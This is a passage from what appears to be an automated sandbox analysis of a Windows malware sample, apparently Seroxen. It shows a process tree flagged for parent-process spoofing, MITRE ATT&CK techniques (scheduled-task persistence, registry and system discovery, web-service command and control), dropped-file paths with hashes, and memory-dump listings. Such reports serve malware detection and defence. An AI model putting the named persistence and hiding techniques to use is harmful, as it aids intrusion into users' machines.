                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                        1⤵
                                                                                                          PID:2920
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:516
                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:116
                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              PID:3308
                                                                                                            • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                              1⤵
                                                                                                                PID:4708
                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                1⤵
                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:4972
                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                  C:\Windows\system32\WerFault.exe -pss -s 444 -p 4360 -ip 4360
                                                                                                                  2⤵
                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                  PID:3248
                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                1⤵
                                                                                                                  PID:3592

                                                                                                                Network

                                                                                                                MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                Execution

                                                                                                                Scheduled Task/Job

                                                                                                                1
                                                                                                                T1053

                                                                                                                Persistence

                                                                                                                Scheduled Task/Job

                                                                                                                1
                                                                                                                T1053

                                                                                                                Privilege Escalation

                                                                                                                Scheduled Task/Job

                                                                                                                1
                                                                                                                T1053

                                                                                                                Discovery

                                                                                                                Query Registry

                                                                                                                2
                                                                                                                T1012

                                                                                                                System Information Discovery

                                                                                                                2
                                                                                                                T1082

                                                                                                                Command and Control

                                                                                                                Web Service

                                                                                                                1
                                                                                                                T1102

                                                                                                                Replay Monitor

                                                                                                                Loading Replay Monitor...

                                                                                                                Downloads

                                                                                                                • C:\ProgramData\Microsoft\Windows\WER\Temp\WER6C85.tmp.csv
                                                                                                                  Filesize

                                                                                                                  37KB

                                                                                                                  MD5

                                                                                                                  c0e74ecaf21b0fc184a4bbf7a91feda0

                                                                                                                  SHA1

                                                                                                                  d021cc361c96bf625c7273764cc2427f43e27d07

                                                                                                                  SHA256

                                                                                                                  27ebf42ee5594e44eb2fadf6ace50789173457e7b66d58cf49ad8b1d0ad57b07

                                                                                                                  SHA512

                                                                                                                  c94ebd6ce44942dbff9527ad9a3931455a2c61053cb209f604c799dd905a54f4add26af557c6ffabe2c5e764ce5d73c43c992433a5af97e74ec5e449e54ee629

                                                                                                                • C:\ProgramData\Microsoft\Windows\WER\Temp\WER6CA5.tmp.txt
                                                                                                                  Filesize

                                                                                                                  13KB

                                                                                                                  MD5

                                                                                                                  a9ed904f5cbbf85c8c608530d29df1db

                                                                                                                  SHA1

                                                                                                                  5825ed373ac7903c1e8ea3b73f7db4e5bdea0a75

                                                                                                                  SHA256

                                                                                                                  bdc7db0541e6d9dcd63a36a1d9233adf39912aabb2593b9c8cdd6c788f744fb5

                                                                                                                  SHA512

                                                                                                                  26e1fa271c3a067929d62bc45fcb614c85c20d8b97aeed6e4865e77149cf8b231ee8509e89656f1cbeb39d91a9696f7019062388844892205f884ba79f83676f

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                                  Filesize

                                                                                                                  162KB

                                                                                                                  MD5

                                                                                                                  152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                  SHA1

                                                                                                                  c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                  SHA256

                                                                                                                  a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                  SHA512

                                                                                                                  2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                                                  Filesize

                                                                                                                  409KB

                                                                                                                  MD5

                                                                                                                  7417c8c73e614f293152575f46134216

                                                                                                                  SHA1

                                                                                                                  cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805

                                                                                                                  SHA256

                                                                                                                  00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3

                                                                                                                  SHA512

                                                                                                                  897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0

                                                                                                                • C:\Windows\Temp\__PSScriptPolicyTest_fmb05mun.l4r.ps1
                                                                                                                  Filesize

                                                                                                                  60B

                                                                                                                  MD5

                                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                  SHA1

                                                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                  SHA256

                                                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                  SHA512

                                                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
                                                                                                                  Filesize

                                                                                                                  2KB

                                                                                                                  MD5

                                                                                                                  2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                                  SHA1

                                                                                                                  445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                                  SHA256

                                                                                                                  3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                                  SHA512

                                                                                                                  42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                  Filesize

                                                                                                                  1KB

                                                                                                                  MD5

                                                                                                                  aa187cac09f051e24146ad549a0f08a6

                                                                                                                  SHA1

                                                                                                                  2ef7fae3652bb838766627fa6584a6e3b5e74ff3

                                                                                                                  SHA256

                                                                                                                  7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f

                                                                                                                  SHA512

                                                                                                                  960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2

                                                                                                                • memory/336-103-0x00007FF88D2F0000-0x00007FF88D300000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/336-96-0x00000248BB480000-0x00000248BB4AB000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/336-102-0x00000248BB480000-0x00000248BB4AB000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/600-69-0x0000021B09100000-0x0000021B0912B000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/600-63-0x0000021B09100000-0x0000021B0912B000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/600-61-0x0000021B090D0000-0x0000021B090F5000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  148KB

                                                                                                                • memory/600-70-0x00007FF88D2F0000-0x00007FF88D300000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/600-62-0x0000021B09100000-0x0000021B0912B000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/680-74-0x00000256875D0000-0x00000256875FB000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/680-80-0x00000256875D0000-0x00000256875FB000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/680-81-0x00007FF88D2F0000-0x00007FF88D300000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/760-107-0x00000145A9F20000-0x00000145A9F4B000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/956-85-0x000001670CC10000-0x000001670CC3B000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/956-91-0x000001670CC10000-0x000001670CC3B000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/956-92-0x00007FF88D2F0000-0x00007FF88D300000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/1192-20-0x0000000074B60000-0x0000000075310000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.7MB

                                                                                                                • memory/1192-0-0x0000000074B6E000-0x0000000074B6F000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/1192-1-0x0000000000AB0000-0x0000000000B1C000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  432KB

                                                                                                                • memory/1192-2-0x0000000005AF0000-0x0000000006094000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  5.6MB

                                                                                                                • memory/1192-3-0x0000000005540000-0x00000000055D2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  584KB

                                                                                                                • memory/1192-4-0x0000000074B60000-0x0000000075310000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.7MB

                                                                                                                • memory/1192-5-0x00000000055E0000-0x0000000005646000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  408KB

                                                                                                                • memory/1192-6-0x0000000005AC0000-0x0000000005AD2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  72KB

                                                                                                                • memory/1192-7-0x00000000068C0000-0x00000000068FC000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  240KB

                                                                                                                • memory/2332-51-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  32KB

                                                                                                                • memory/2332-54-0x00007FF8CD270000-0x00007FF8CD465000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  2.0MB

                                                                                                                • memory/2332-55-0x00007FF8CBDA0000-0x00007FF8CBE5E000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  760KB

                                                                                                                • memory/2332-58-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  32KB

                                                                                                                • memory/2332-49-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  32KB

                                                                                                                • memory/2332-50-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  32KB

                                                                                                                • memory/2332-53-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  32KB

                                                                                                                • memory/2332-48-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  32KB

                                                                                                                • memory/3316-47-0x00007FF8CBDA0000-0x00007FF8CBE5E000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  760KB

                                                                                                                • memory/3316-30-0x0000012FB2070000-0x0000012FB2092000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  136KB

                                                                                                                • memory/3316-46-0x00007FF8CD270000-0x00007FF8CD465000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  2.0MB

                                                                                                                • memory/3316-45-0x0000012FB22E0000-0x0000012FB230A000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  168KB

                                                                                                                • memory/3572-13-0x0000000074B60000-0x0000000075310000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.7MB

                                                                                                                • memory/3572-14-0x0000000074B60000-0x0000000075310000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.7MB

                                                                                                                • memory/3572-35-0x00000000075D0000-0x00000000075DA000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  40KB

                                                                                                                • memory/3572-850-0x0000000074B60000-0x0000000075310000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.7MB

                                                                                                                • memory/3572-851-0x0000000074B60000-0x0000000075310000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.7MB